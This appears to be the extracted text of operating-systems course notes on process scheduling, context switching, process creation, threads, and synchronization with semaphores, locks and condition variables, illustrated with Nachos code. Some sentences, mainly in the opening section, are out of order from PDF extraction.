The general definition is when a system is spending more time on overhead than on useful work. Some web servers are conceptually run to completion. etc. their behavior is more complex. but you should think about what constitutes a process context. but because they are usually implemented on systems with a more complex scheduler. Good questions to ask are “why does a process leave the running state?” and “how does the OS pick The process to run?” The answers to those questions make up the subtopic of process scheduling. Small time quanta give good interactive performance to short interactive jobs (which are likely to block for I/O). • • • • • There are several kinds of schedulers: • • • • schedulers preemptive nonpreemptive cooperative run-to completion Run-to-completion schedulers are the easiest to understand. There may be multiple ready queues to reflect jobs priorities and multiple blocked queues to represent the events for which the process is waiting.) of one Process is changed for another. A preemptive multiprocessing system interrupts (preempts) a running process if it has had the CPU too long and forces a context switch. Frequently there is more than one ready or blocked queue. The process leaves the running state exactly once. The time a process can keep the CPU is called the system’s time quantum.• • These states may be defined implicitly. An example is Apple’s original multitasking System and some Java systems. They explicitly block for I/O or they specifically give up the CPU to other processes. Thrashing is a condition we shall see in other subsystems as well. the system is said to be thrashing. If the time quantum is so small that the system spends more time switching processes than doing useful work. open files. or Blocked if it’s on the blocked queue. Examples are batch systems. when it exits. 39 . A process is in the ready state if its on the ready queue. Larger quanta are better for long-running CPU bound jobs because they do not make as many context switches (which don’t move their computations forward). A process never enters the blocked state. The choice of time quantum can have a profound effect on system performance. We’ll talk more about the details of this next lecture. UNIX is a preemptive multitasking system. Processes in a coopertive multitasking environment tell the OS when to switch them. The act of removing one process from the running state and putting another there is called a context switch because the context (that is the running environment: all the user credentials.

In the limit. i. N. It has the advantages that it’s easy to implement.Process Scheduling and Implementation Scheduling Last lecture we discussed half of process scheduling. This is a simple discipline to implement. and each of n processes gets 1/n of the CPU time. Processes are added to the back of the ready queue. which process is scheduled to take its place. B. Today we start with the other half. The algorithms discussed today and variations on them tuned for specific other applications are important tools for your bag of OS design tricks. but gives somewhat unpredictable results. the discipline is called processor sharing. This is our first introduction to scheduling algorithms which will be a repeating topic in the course. The relevant parameters to trade off in process Scheduling includes: • • • • • • • • • • • Response Time for processes to complete. As quanta get larger. that are a scheduling discipline random scheduling. and several other things.. 40 . Why not just pick a process at random? Congratulations. it may be an effective scheduling mechanism! All scheduling mechanisms involve design tradeoffs. when a process gives up the CPU. the OS may want to favor certain types of processes or to minimize a statistical property like average time Implementation Time This includes the complexity of the algorithm and the maintenance Overhead Time to decide which process to schedule and to collect the data needed to make that selection Fairness To what extent are different users’ processes treated differently Some Scheduling Disciplines First-In-First-Out (FIFO) and Round Robin The ready queue is a single FIFO queue where the next process to be run is the one at the front of the queue. disk blocks. Operating systems schedule pages of memory. and with equal sized quanta on a preemptive scheduling system results in each process getting roughly an equal time on the processor. FIFO tends to discriminate against short jobs that give up the CPU quickly for I/O while long CPU-bound jobs hold it for their full quantum. if you have a homogeneous set of jobs.e. a preemptive system with a quanta the size of one machine instruction and no context switch overhead.

Starvation is simpler to understand.) One method of handling this is to assign each process a priority and run the highest priority process. Shortest Job First (SJF) An important metric of interactive job performance is the response time of the process (the amount of time that the process is in the sysytem. For batch processes that run frequently. Interactive jobs are given high priority and run when there are some.Priority Scheduling FIFO is eqalitarian . B. is determining those response times. Consider three processes. 41 . the problem of determining run times a priori is impossible. B will run to completion even though A.we pick a scheduling policy). More complex systems have rules about moving processes between priority levels. A. fast stream of interactive jobs. Particularly aggressive priority schedulers reschedule jobs whenever a job moves on any queue. For every scheduling strategy.the Mars Rover a couple years ago suffered a failure due to a priority inversion. or computed on the fly (process aging). Processes are labelled with their expected processing time. All of these have their problems. Any CPU-bound jobs will be never run.g. could continue if C would run. guesses are easy to come by. a prime tester runs quickly on even numbers and slowly on primes).all processes are treated equally. It is often reasonable to discriminate between processes based on their relative importance.e. The CTSS system in Tannenbaum uses a different quantum at each priority scheduling level.. (The payroll calculations may be more important than my video game. The final problem with priority systems is how to determine priorities. This is sometimes referred to as a priority inversion. A has the highest priority (runs first) and C the lowest with B having a priority between them. (What to do at on a tie puts us back to square 1 . Lower-priority CPU-bound jobs share what’s left. The problem. C.Starvation and Inversion When processes cooperate in a priority scheduling system. Imagine our 2-level priority system above with an endless. i. of course. Other programs have run times that vary widely (e. so interactive jobs would be able to run immediately after their I/O completes. A blocks waiting for C to do something.) Priority Problems . there can be interactions between the processes that confuse the priority system. This happens in real systems . This solves FIFOs problem with interactive jobs in a mixed workload. In general. there is a counter-strategy. SJF minimizes the average repsonse time for the system. a higher priority process. and the shortest one is scheduled first. The can be statically allocated to each program (ls always runs with priority 3) or each user (root always runs with priority 3). (Systems that move processes between mutliply priorities based on their behavior are sometimes called multilevel feedback queues. on some queue).

Although not all of them are directly manipulated on a context switch. Context Switching The act of switching from one process to another is somewhat machine-dependent. however. A general outline is: 42 . Process Implementation The operating system represents a process primarily in a data structure called a Process Control Block (PCB). The simplest is to use a moving average. When a process is created.There is hope. in the form of heuristics (that is. it is allocated a PCB that includes • • • • • • • • • • • • • • • • • CPU Registers Pointer to Text (program code) Pointer to uninitialized data Stack Pointer Program Counter Pointer to Data Root directory Default File Permissions Working directory Process State Exit Status File Descriptors Process Identifier (pid) User Identifier (uid) Pending Signals Signal Maps Other OS-dependent information These are some of the major elements that make up the process context. and after each run of that program it is recomputed as: estimate = α (old estimate) + (1 − α ) measurement (for 0 < α ≤ 1 and constant Moving averages are another powerful tool for your design toolkit. algorithms that provide good guesses). An average run time is kept for each program. You’ll see Tack Control Block (TCB) and other variants.

the fork/exec and the spawn models. and spawn will have a standard way of handling them. etc.linked lists of self-describing parameters . Then a new address space (memory) is allocated for the process. Typical fork pseudo-code looks like: if (fork() == 0 ) /* Child process */ change standard input block signals for timers run the new program else /* Parent process */ wait for child to complete Any parameters of the child process’s operating environment that must be changed must be included in the parameters to spawn. Process Creation There are two main models of process creation . for example AmigaDOS® uses tag lists . etc) This process is replaced on the ready queue and the next process selected by the scheduling algorithm • • The new process’s operating system and processor state is restored The new process continues (to this process it looks like a block call has just returned. The steps to process creation are similar for both models. There are various ways to handle the proliferation of parameters that results. or as if An interrupt service routine (not a signal handler) has just returned Context switches must be made as safe and fast as possible. and spawn creates a new 43 .to solve the problem. The OS gains control after the fork or spawn system call. memory map and floating point state. a new process is created and that program run directly. In the spawn model the new program and arguments are named in the system call. It allows a program to arbitrarily change the environment of the child process before starting the new program. Safe because isolation must be maintained and fast because any time spent doing them is stolen from processes doing useful work. Fork is the more flexible model.• • • • The OS gets control (either because of a timer interrupt or because the process made a system call. and creates and fills a new PCB. On systems that support fork. Linux’s well-tuned context switch code runs in about 5 microseconds on a high-end Pentium. a new process is created as a copy of the original one and then explicitly executes (exec) a new program to run. Fork creates a copy of the parent address space.) Processor state is saved (registers. Operating system processing info is updated (pointer to the current PCB.

CHAPTER 4 THREADS Threads Despite of the fact that a thread must execute in process. An operating system that has thread facility. a register set. vfork. a thread can be in any of several states (Running. Processes are used to group resources together and threads are the entities scheduled for execution on the CPU. data section.e. such as open files and signals. In many respect. The CPU switches rapidly back and forth among the threads giving illusion that the threads are running in parallel. We’ll discuss other systems to mitigate the cost of fork when we talk about memory management. process with one thread. OS resources also known as task. In a process. This can be wasteful if that address space will be deleted and rewritten in a few instructions’ time. An important difference between the two systems is that the fork call must create a copy of the parent address space. A thread is a single sequence stream within in a process. Because threads have some of the properties of processes. Since thread will generally call different procedures and thus a different execution history. the basic unit of CPU utilization is a thread.address space derived from the program. 44 . Then the PCB is put on the run list and the system call returns. and a stack space. Ready or Terminated).. Like a traditional process i. that lets the child process use the parent’s memory until an exec is made. A thread has or consists of a program counter (PC). threads are popular way to improve application through parallelism. threads allow multiple executions of streams. the process and its associated threads are different concept. Threads are not independent of one other like processes as a result threads shares with other threads their code section. Each thread has its own stack. This is why thread needs its own stack. Blocked. One solution to this problem has been a second system call. they are sometimes called lightweight processes.

Typical of Unix plus all currently envisioned new operating systems. Must ensure that all processes get their fair share of the CPU. for example). then takes the CPU away from that process and lets another process run. Your WWW browser is a process. but still have separation problems. Process state determines the effect of the instructions. Process is a key OS abstraction that users see . So DOS and other uniprogrammed systems put in things like memory-resident programs that invoked asynchronously. Must save and restore process state.which processes get to use the physical resources of the machine when? One crucial resource: CPU. and uniprogramming does not allow this. • • An execution stream is a sequence of instructions. One key problem with DOS is that there is no memory protection one program may write the memory of another program. Two concepts: uniprogramming and multiprogramming. Allows system to separate out activities cleanly. causing weird bugs. It usually includes (but is not restricted to): o Registers o Stack o Memory (global variables and dynamically allocated memory) o Open file tables o Signal management information Key concept: processes are separated: no process can directly affect the state of another process. the OS generates a process to run the program. Typical example: DOS. When you execute a program you have just compiled. • • • The shell you type stuff into is a process. 45 .the environment you interact with when you use a computer is built up out of processes. Key issue: fairness.Process and Threads A process is an execution stream in the context of a particular process state. • Uniprogramming: only one process at a time. Multiprogramming: multiple processes at a time. Problem: users often wish to perform more than one activity at a time (load a remote file while editing a program. How does the OS implement the process abstraction? Uses a context switch to switch from running one process to running another process. • Multiprogramming introduces the resource sharing problem . Standard solution is to use preemptive multitasking . Organizing system activities around processes has proved to be a useful way of separating out different activities into coherent units.OS runs one process for a while.

some early personal computers switched all of process's memory out to disk (!!!). respond appropriately to the event. the OS will have a separate thread for each process. Examples: • • User hits a key. Key difference between processes and threads is that multiple threads share parts of their state. But. But every process on the machine has its own set of registers. Solution: save and restore hardware state on a context switch. the give the CPU to that process. allow multiple threads to read and write same memory.How does machine implement context switch? A processor has a limited amount of physical resources. What about memory? Most machines allow memory from multiple processes to coexist in the physical memory of the machine. What is in PCB? Depends on the hardware. The disk controller finishes reading in the disk block and generates and interrupt. interrupting the processor.they wait for an event to happen. The keystroke is echoed on the screen. but other threads can read and write the stack memory. This eventually generates requests to the OS to send request packets out over the network to a remote WWW server. threads are a key structuring mechanism of the OS. Time-slice timer goes off. and that thread will perform OS activities on behalf of the process. it has only one register set. • • • Registers . The OS must save the state of the current process. Typically. The OS sends the packets. then routes the packets to that process. choose another process to run. The response packets come back from the WWW server. In particular. The operating system figures out which disk blocks to bring in. A Mosaic or Netscape user asks for a URL to be retrieved. Don't need to do anything to the MMU when switch threads. (Recall that no processes could directly access memory of another process). and generates a request to the disk controller to read the disk blocks into memory.almost all machines save registers in PCB. an OS will have a separate thread for each distinct activity. Processor Status Word. • • • • When build an event-driven system with several distinct serial activities. In this case we say that each user process is backed by a kernel thread. What is in a thread control block? Typically just registers. then wait for the next event. The OS figures out which process should get the packets. each thread still has its own registers. Save the state in Process Control Block (PCB). Also has its own stack. 46 . A user program issues a system call to read a file. For example. Some may require Memory Management Unit (MMU) changes on a context switch. A thread is again an execution stream in the context of a thread state. Typically. But. because all threads can access same memory. Operating Systems are fundamentally event-driven systems . The OS moves the read data into the user program and restarts the user program.

threads must coordinate their activities very closely. transferring control away from one thread to an interrupt handler. and may interfere with the thread's activities unless the programmer does something to limit the asynchrony.• When process issues a system call to read a file. must make sure that the OS serializes the disk requests appropriately. It also keeps a running sum of the total amount of time spent in all user programs. figure out which disk accesses to generate. • Having a separate thread for each activity allows the programmer to program the actions associated with that activity as a single serial stream of actions and events. Two threads increment their local counters for their processes. Asynchronous events happen arbitrarily as the thread is executing. its thread must find some free memory and give it to the process. When process starts up a remote TCP connection. A time-slice switch occurs. and the recorded total time spent in all user processes is less than the sum of the local times. Two threads need to write to the display. • • If two processes issue read file system calls at close to the same time. When one process allocates memory. One complication that threads must deal with: asynchrony. Two threads running on different processors read and write the same memory. It then suspends until the disk finishes reading in the data. the process's thread will take over. can lead to incorrect behavior. The disk controller gets horribly confused and reads the wrong disk block. The combination of the two threads issues a forbidden request sequence. transferring control from one thread to another. 47 • • . the second thread runs on a different processor and also issues the memorymapped writes to program the disk controller. then concurrently increment the global counter. Their increments interfere. its thread handles the low-level details of sending out network packets. For accounting reasons the operating system keeps track of how much time is spent in each user program. if not properly controlled. First thread starts to program disk controller (assume it is memory-mapped. and smoke starts pouring out of the display. Examples: • • • An interrupt occurs. Having threads share the same address space makes it much easier to coordinate activities can build data structures that represent system state and have threads read and write data structures to figure out what to do when they need to process a request. and must issue multiple writes to specify a disk operation). The first thread starts to build its request. Examples: • Two threads need to issue disk requests. Programmer does not have to deal with the complexity of interleaving multiple activities on the same thread. In the meantime. and issue the low level instructions required to start the transfer. Must ensure that multiple threads allocate disjoint pieces of memory. Why allow threads to access same memory? Because inside OS. Asynchronous events. but before it finishes a time-slice switch occurs and the second thread starts its request.

• • To actually start the thread running. and the thread that called Fork continues. Will use the one in Nachos: class Thread public: Thread(char* debugName). The Fork method gives it the function and a parameter to the function. What does Fork do? It first allocates a stack for the thread. threads execute concurrently. This is the best way to reason about the behavior of threads. int arg). the OS only has a finite number of processors.So. a). print("%d : a = %d\n". void Finish(). p. void Fork(void (*func)(int). Conceptually. Appropriate use allows programmers to avoid problems like the ones outlined above. and it can't run all of the runnable threads at once. These operations allow threads to control the timing of their events relative to events in other threads. it sets the stack pointer in the TCB to the stack. the thread scheduler grabs a thread off of the run queue and runs the thread. it sets the PC in the TCB to be the first instruction in the function. it will invoke the function and pass it the correct parameter. must multiplex the runnable threads on the finite number of processors. int a = 0. It then sets up the TCB so that when the thread starts running. the function will magically start to run. It allocates a data structure with space for the TCB. void sum(int p) a++. void Yield(). Thread Creation. Whenever a processor becomes idle. Fork then returns. So. must tell it what function to start running when it runs. The Thread constructor creates a new thread. Then. First example: two threads that increment a variable. But in practice. • • • Let's do a few thread examples. It then puts the thread on a run queue someplace. Key mechanism: synchronization operations. The system maintains a queue of runnable threads. ~Thread(). How does OS set up TCB so that the thread starts running at the function? First. 48 . it sets the register in the TCB holding the first parameter to the parameter. Then. Manipulation and Synchronization We first must postulate a thread creation and manipulation interface. When the thread system restores the state from the TCB. programmers need to coordinate the activities of the multiple threads so that these bad things don't happen.

} • • The two calls to sum run concurrently. p and a into the registers that it uses to pass arguments to the print routine. You can have the compiler generate assembly code instead of object code by giving it the -S flag. What are possible results? 0: 1 1: 2 0: 1 1: 1 49 . we must break the sum subroutine up into its primitive components. The best way to understand the instruction sequence is to look at the generated assembly language (cleaned up just a bit). but with a . %r0 [%r0].%r1 %r1. It then reads the values of the control string.c or .[%r0] [%r0]. Sum first reads the value of into a register.cc file.s suffix. 1). then stores the contents of the register back into a.L17. the result depends on how the instructions interleave. • la ld add st ld %o0 mop la call • a. sum (0).1. What are the possible results of the program? To understand this fully. which prints out the data. %o0 print So when execute concurrently. It then calls print.} void main() { Thread *t = new Thread ("child"). t->Fork(sum. %o3 ! Parameters are passed starting with %o0.%r1 %r1. It will put the generated assembly in the same file name as the . %o1 . It then increments the register.

it executes as one unit. Use synchronization operations to make code sequences atomic. So. the programmer is not happy with all of the possible results listed above.you may get different results when you run the program more than once. First synchronization abstraction: semaphores. To achieve this. More formally. That is. Here is the Semaphore interface from Nachos: class Semaphore public: Semaphore(char* debugName. void V(). Want the increment operation to be atomic. conceptually. • Chances are. stores and add machine instructions. P and V. it can be very difficult to reproduce bugs. must make the increment operation atomic. must prevent the interleaving of the instructions in a way that would interfere with the additions. Typically build complex atomic operations up out of sequences of primitive operations. if several atomic operations execute. An atomic operation is one that executes without any interference from other operations . In our case above. A semaphore is. int initial Value). void P(). Nondeterministic execution is one of the things that make writing parallel programs much more difficult than writing serial programs. the final result is guaranteed to be the same as if the operations executed in some serial order. build an increment operation up out of loads. } • Here is what the operations do: 50 • • • • . ~Semaphore().in other words. Probably wanted the value of to be 2 after both threads finish. a counter that supports two atomic operations.1: 2 0: 1 1: 1 0: 1 1: 1 0: 2 0: 2 1: 2 0: 2 1: 1 1: 2 0: 2 So the results are nondeterministic . Concept of atomic operation. In our case the primitive operations are the individual machine instructions.

o P (): Atomically waits until the counter is greater than 0. 1). t = a. then decrements the counter and returns. void sum(int p) { int t. only one thread should access a. Use mutual exclusion to make operations atomic. Here is the synchronization problem: make sure that the consumer does not get ahead of the producer. t->Fork (sum. Can use semaphores to do this. s->P (). Semaphore *s. You can also think of a person typing at a keyboard as a producer and the shell program reading the characters as a consumer. Semaphores do much more than mutual exclusion. t). } void main () Thread *t = new Thread ("child"). count): creates a semaphore and initializes the counter to count. The idea is that the producer is generating data and the consumer is consuming data. The code that performs the atomic operation is called a critical section. sum (0). o V (): Atomically increments the counter. s = new Semaphore ("s". Here is how it works: 51 • • . print ("%d : a = %d\n". So a Unix pipe has a producer and a consumer. • Here is how we can use the semaphore to make the sum example work: int a = 0. But. p. } • We are using semaphores here to implement a mutual exclusion mechanism. They can also be used to synchronize producer/consumer programs. a++. s->V (). The idea behind mutual exclusion is that only one thread at a time should be allowed to do something. 1).o Semphore (name. In this case. we would like the producer to be able to produce without waiting for the consumer to consume.

we want to let the producer to get ahead of the consumer if it can. pragmatics intrude. consume the next unit of data void producer(int dummy) while (1) produce the next unit of data s->V (). t->Fork(consumer.Semaphore *s. 1). void producer (int dummy) while (1) 52 . consume the next unit of data empty->V (). void consumer (int dummy) while (1) s->P (). but only a given amount ahead. If we let the producer run forever and never run the consumer. 1). the producer must wait before it can put any more data in. void consumer (int dummy) While (1) full->P (). But no machine has an infinite amount of storage. Semaphore *empty. } In some sense the semaphore is an abstraction of the collection of data. t = new Thread ("producer"). We need to implement a bounded buffer which can hold only N items. t->Fork(producer. we have to store all of the produced data somewhere. void main ) s = new Semaphore ("s". If the bounded buffer is full. Thread *t = new Thread ("consumer"). 0). So. • In the real world. Semaphore *full.

t = new Thread ("producer"). There is another called locks and condition variables.empty->P (). In assignment 1 you will implement locks in Nachos on top of semaphores. Here is the Nachos lock interface: class Lock public: Lock (char* debugName). then sets the lock state to locked. N). Locks are an abstraction specifically for mutual exclusion only. FREE ~Lock (). // these are the only operations on a lock void Release (). Thread *t = new Thread ("consumer"). // deallocate lock // initialize lock to be void Acquire (). 0). } An example of where you might use a producer and consumer in an operating system is the console (a device that reads and writes characters from and to the system console). // they are both *atomic* } • A lock can be in one of two states: locked and unlocked. t->Fork(consumer. 1). full = new Semaphore("full". Semantics of lock operations: o Lock (name): creates a lock that starts out in the unlocked state. You would probably use semaphores to make sure you don't try to read a character before it is typed. • • Semaphores are one synchronization abstraction. 53 . produce the next unit of data full->V (). t->Fork(producer. o Acquire (): Atomically waits until the lock state is unlocked. o Release (): Atomically changes the lock state to unlocked from locked. void main () empty = new Semaphore ("empty". 1).

Are also weaker forms of fairness. (liveness) o All unlocks complete in finite time. So. o Fairness: threads acquire lock in the order they ask for it. it must wait. } • • • Semantics of condition variable operations: o Condition (name): creates a condition variable. When Wait returns the lock will have been reacquired. It then performs the access. one of the threads will get it. (safety) o If multiple threads try to acquire an unlocked lock. Here is the Nachos interface: class Condition public: Condition (char* debugName).if the consumer wants to consume a piece of data before the producer produces the data. When one thread wants to access a piece of data. void Wait (Lock *conditionLock). 54 . typically associate a lock with pieces of data that multiple threads access. the lock allows threads to perform complicated atomic operations on each piece of data. Can you implement unbounded buffer only using locks? There is a problem . But locks do not allow the consumer to wait until the producer produces the data. o Simple to use. (liveness) • What are desirable properties for a locking implementation? o Efficiency: take up as little resources as possible. then unlocks the lock. This is bad because it wastes CPU resources.• What are requirements for a locking implementation? o Only one thread can acquire lock at a time. it first acquires the lock. void Signal (Lock *conditionLock). There is another synchronization abstraction called condition variables just for this kind of situation. • When use locks. o Wait (Lock *l): Atomically releases the lock and waits. So. consumer must loop until the data is ready. ~Condition (). void Broadcast (Lock *conditionLock).

int avail = 0. In some cases you need more than one condition variable. l->Release(). l->Release(). void consumer (int dummy) while (1) { l->Acquire(). • consume the next unit of data avail--. o Broadcast (Lock *l): Enables all of the waiting threads to run. it acquires the lock. In assignment 1 you will implement condition variables in Nachos on top of semaphores. it uses the condition variable to wait for another operation to bring the data structure into a state where it can perform the operation. Typically. c->Signal (l). In this case we have 2 consumers. If it has to wait before it can perform the operation. void main () 55 . Lock *l.o Signal (Lock *l): Enables one of the waiting threads to run. Before the program performs an operation on the data structure. produce the next unit of data avail++. When Broadcast returns the lock is still acquired. Condition *c. you associate a lock and a condition variable with a data structure. if (avail == 0) c->Wait(l). void producer (int dummy) while (1) l->Acquire(). Let's say that we want to implement an unbounded buffer using locks and condition variables. • • All locks must be the same. When Signal returns the lock is still acquired.

Depending on the data structure used to store produced items. so this would not happen. calls consumer. The example above will work with Hoare condition variables but not with Mesa condition variables. } • There are two variants of condition variables: Hoare condition variables and Mesa condition variables. Other threads that acquire the lock can execute between the signaler and the waiter. consume the next unit of data 56 . thread 2 would always run next. For Mesa condition variables. and signals thread 2. and suspends. t = new Thread ("producer").l = new Lock ("l"). • • How can we fix this problem? Replace if with a while. when one thread performs a Signal. thread 1 one producing data. 2). thread 3 runs next. (Note: with Hoare monitors. t->Fork(consumer. What is the problem with Mesa condition variables? Consider the following scenario: Three threads. 1). o Instead of thread 2 running next. For Hoare condition variables. Thread *t = new Thread ("consumer"). may get some kind of illegal access error. and tries to consume an item that is not there. o Thread 2 calls consumer. o Thread 1 calls producer. t->Fork(consumer. and consumes the element. Thread *t = new Thread ("consumer"). 1).) o Thread 2 runs. while (avail == 0) c->Wait(l). there are no guarantees when the signalled thread will run. void consumer (int dummy) while (1) l->Acquire(). c = new Condition ("c"). the very next thread to run is the waiting thread. threads 2 and 3 consng data. t->Fork(producer.

If you don't. The allocation station gives you a number. one or more condition variables. and someone else can use the machine. numbered 1 to N. So. There are also P deallocation stations. but also allows programmers to exert finer grain control over the locked sections by supporting synchronized blocks within methods. you go to an allocation station and put in your coins. The monitor also has a lock and. Laundromat Example: A local Laundromat has switched to a computerized machine allocation scheme. There are N machines. and you use that machine. But more recent languages have tended not to support monitors explicitly. This abstraction is called a monitor. Here is the alpha release of the machine allocation software: allocate (int dummy) { while (1) { wait for coins from user n = get (). When you want to wash your clothes. and expose the locking operations to the programmer. Monitor languages were popular in the middle 80's . But synchronized blocks still present a structured model of synchronization. give number n to user deallocate (int dummy) while (1) Wait for number n from user 57 • • • . By the front door there are P allocation stations. • • In this example. you can get really obscure bugs that show up very infrequently. programmer does not have to put in the lock operations.they are in some sense safer because they eliminate one possible programming error. A monitor is a data structure plus a set of operations (sort of like an abstract data type).it supports monitors. Always put while's around your condition variable code. what is the data that the lock and condition variable are associated with? The avail variable. The compiler for the monitor language automatically inserts a lock operation at the beginning of each routine and an unlock operation at the end of the routine. When your clothes finish. So the programmer has to insert the lock and unlock operations by hand.Avail--. optionally. Java takes a middle ground . People have developed a programming abstraction that automatically associates locks and condition variables with data. l->Release(). so it is not possible to mismatch the lock acquire and release. this is a crucial point. you give the number back to one of the deal location stations. } } In general.

Lock *l. main () for (i = 0. i < N. 58 . i < P. i++) if (a[i] == 0) { A[i] = 1. } • • It seems that the alpha software isn't doing all that well. l->Release (). i < N. return (i+1). int a[N]. void put (int i) a [i-1] = 0.put (i). Just looking at the software. int get() { for (i = 0. 0). } • The key parts of the scheduling are done in the two routines get and put. t->Fork(deallocate. for (i = 0. which use an array data structure a to keep track of which machines are in use and which are free. Why does this happen? We can fix this with a lock: int a[N]. i++) { t = new Thread ("allocate"). t = new Thread ("deallocate"). 0). you can see that there are several synchronization problems. The first problem is that sometimes two people are assigned to the same machine. i++) if (a [i] == 0) a [i] = 1. int get () l->Acquire (). t->Fork(allocate.

l->Release (). The situation calls for condition variables. l->Release (). c->Signal (). i++) if (a [i] == 0) a [i] = 1. int a[N]. int get() l->Acquire(). But what happens if someone comes in to the laundry when all of the machines are already taken? What does the machine return? Must fix it so that the system waits until there is a machine free before it returns a number. l->Release (). Condition *c. l->Release (). a [i-1] = 0. i < N. void put (int i) l->Acquire(). So now. Lock *l. void put (int i) l->Acquire (). while (1) for (i = 0. • What data is the lock protecting? The a array. return (i+1).return (i+1). c->Wait (l). a[i-1] = 0. have fixed the multiple assignment problem. 59 .

succeeds 1 2 3 4 free(10) . For example. Example with malloc/free. c->Broadcast (l). return pointer to allocated chunk void free (char *m) l->Acquire (). l->Release (). Condition *c. deallocate m. char *malloc (int s) l->Acquire (). Time Process 1 malloc(10) . Lock *l. • allocate chunk of size s. Also use a broadcast for allocation/deallocation of variable sized units. The thread that actually deleted the file could use a broadcast to wake up all of the threads. l->Release ().broadcast resume malloc(5) .waits Process 3 malloc(5) suspends lock . while (cannot allocate a chunk of size s) c->Wait (l). For an event that happens only once.• When would you use a broadcast operation? Whenever want to wake up all waiting threads.waits gets lock . a bunch of threads may wait until a file is deleted. not just one. Initially start out with 10 bytes free.suspends lock gets lock .succeeds 60 Process 2 malloc(5) . Example: concurrent malloc/free.

Some of the similarities and differences are: 61 . The following implementation is INCORRECT. sema->P().waits resume malloc(5) . class Condition private: int waiting. What would happen if changed while loop to an if? • You will be asked to implement condition variables as part of assignment 1.succeeds What would happen if changed c->Broadcast(l) to c->Signal(l)? At step 10.5 6 7 8 9 10 resume malloc(7) . l->Release(). waiting--. As we mentioned earlier that in many respect threads operate in the same way as that of processes. void Condition::Signal (Lock* l) if (waiting > 0) seamy->V ().broadcast malloc(7) . l->Acquire(). and it would not get the chance to allocate available memory.waits free(5) . void Condition::Wait (Lock* l) waiting++. Semaphore *sema. Please do not turn this implementation in. process 3 would not wake up.succeeds malloc(3) .waits resume malloc(3) .

Like processes. But this cheapness does not come free . Because of the very nature. threads do not need new address space. if one thread is blocked. threads within a processes execute sequentially. thread can create children. Threads are cheap in the sense that 1.Similarities • • • • Like processes threads share CPU and only one thread active (running) at a time. threads can take advantage of multiprocessors. Unlike processes. Because threads can share common data. In fact.the biggest drawback is that there is no protection between threads. 3. User Level Threads and Kernel Level Threads User-Level Threads User-level threads implement in user-level libraries. Context switching are fast when working with threads. And like process. the kernel knows nothing about user-level threads and manages them as if they were single-threaded processes. Unlike processes. A process with multiple threads make a great server for example printer server. Advantages: 62 . threads are not independent of one another. threads are cheap to create. 3. 2. they do not need to use interprocess communication. The reason is that we only have to save and/or restore PC. global data. another thread can run. rather than via systems calls. Note that processes might or might not assist one another because processes may originate from different users. 1. They only need a stack and storage for registers therefore. 2. Differences • • • Unlike processes. threads within a processes. That is. Why Threads? Following are some reasons why we use threads in designing operating systems. so thread switching does not need to call operating system and to cause interrupt to the kernel. all threads can access every address in the task. SP and registers. Threads use very little resources of an operating system in which they are working. Like processes. program code or operating system resources. thread are design to assist one other.

Simple Representation: Each thread is represented simply by a PC. the kernel knows about and manages the threads. Therefore. all stored in the user process address space.. Disadvantages: • There is a lack of coordination between threads and operating system kernel. • Kernel-Level Threads In this method. the kernel also maintains the traditional process table to keep track of processes. Operating Systems kernel provides system call to create and manage threads.e. Kernel-level threads are especially good for applications that frequently block. switching between threads and synchronization between threads can all be done without intervention of the kernel. As a result there is significant overhead and increased in kernel complexity. Since kernel must manage and schedule threads as well as processes. In addition. if one thread causes a page fault. registers. the kernel has a thread table that keeps track of all threads in the system. entire process will blocked in the kernel. • Fast and Efficient: Thread switching is not much more expensive than a procedure call. Otherwise. stack and a small control block. User-level threads requires non-blocking systems call i. process as whole gets one time slice respect of whether process has one thread or 1000 threads within. It require a full thread control block (TCB) for each thread to maintain information about threads. threads operations are hundreds of times slower than that of user-level threads. It is up to each thread to relinquish control to other threads. even if there are runable threads left in the processes. For example. No runtime system is needed in this case. For instance. a multithreaded kernel. • Simple Management: This simply means that creating a thread. Disadvantages: • • The kernel-level threads are slow and inefficient. Instead of thread table in each process. Advantages: • • Because kernel has full knowledge of all threads. Some other advantages are • • User-level threads does not require modification to operating systems. 63 . the process blocks. Scheduler may decide to give more time to a process having large number of threads than process having small number of threads.The most obvious advantage of this technique is that a user-level threads package can be implemented on an Operating System that does not support threads.

for example. Resources used in Thread Creation and Process Creation When a new thread is created it shares its code section. For example. they require space to store. For example. Information about open files of I/O devices in use. and the general-purpose registers. Application that Benefits from Threads A proxy server satisfying the requests for a number of computers on a LAN would be benefited by a multi-threaded process. an extensive sharing among threads there is a potential problem of security. a program that reads input. The creation of a new process differs from that of a thread mainly in the fact that all the shared resources of a thread are needed explicitly for each process. it is relatively easier for a context switch using threads. In other words. So though two processes may be 64 . as they would block until the previous one completes. • Disadvantages of Threads over Multiprocesses • • Blocking The major disadvantage if that if the kernel is single threaded. data section. a system call of one thread will block the whole process and CPU may be idle during the blocking period. It is quite possible that one thread over writes the stack of another thread (or damaged shared data) although it is very unlikely since threads are meant to cooperate on a single task. But it is allocated its own stack. one for each task. Sharing Treads allow the sharing of a lot resources that cannot be shared in process. etc. sharing code section. but they do not require space to share memory information.Advantages of Threads over Multiple Processes • Context Switching Threads are very inexpensive to create and destroy. data section and operating system resources like open files with other threads. and they are inexpensive to represent. Application that cannot benefit from Threads Any sequential process that cannot be divided into parallel task will not benefit from thread. a program that displays the time of the day would not benefit from multiple threads. any program that has to do more than one task at a time could benefit from multitasking. With so little context. it is much faster to switch between threads. Security Since there is. Operating System resources like open file etc. the SP. register set and a program counter. and outputs could have three threads. In general. the PC. For example. process it.

the interrupt handler checks how much time the current running process has used. Since in this case no thread scheduling is provided by the Operating System. The registers are loaded from the process picked by the CPU scheduler to run next. context switches occur frequently enough that all processes appear to be running concurrently. Possible accounting information for this process. It is relatively easy for the kernel to accomplished this task. If it has used up its entire time slice. In a multiprogrammed uniprocessor computing system. Before a process can be switched its process control block (PCB) must be saved by the operating system. Threads can also be implemented entirely at the user level in run-time libraries. If a process has more than one thread. The CPU scheduling information for the process. PC. The values of the different registers. a hardware clock generates interrupts periodically. The program counter. This makes the creation of a new process very costly compared to that of a new thread. it is the responsibility of the programmer to yield the CPU frequently enough in each thread so all threads in the process can make progress. This allows the operating system to schedule all processes in main memory (using scheduling algorithm) to run on the CPU at equal intervals. Context Switch To give each process on a multiprogrammed machine a fair share of the CPU. 65 . It involves switch of register set. Memory management information regarding the process. This is the case if threads are implemented at the kernel level. the Operating System can use the context switching technique to schedule the threads so they appear to execute in parallel. Each switch of the CPU from one process to another is called a context switch. Two processes also do not share other resources with each other. then the CPU scheduling algorithm (in kernel) picks a different process to run. Action of kernel to Context Switch among Processes Context switches among processes are expensive. 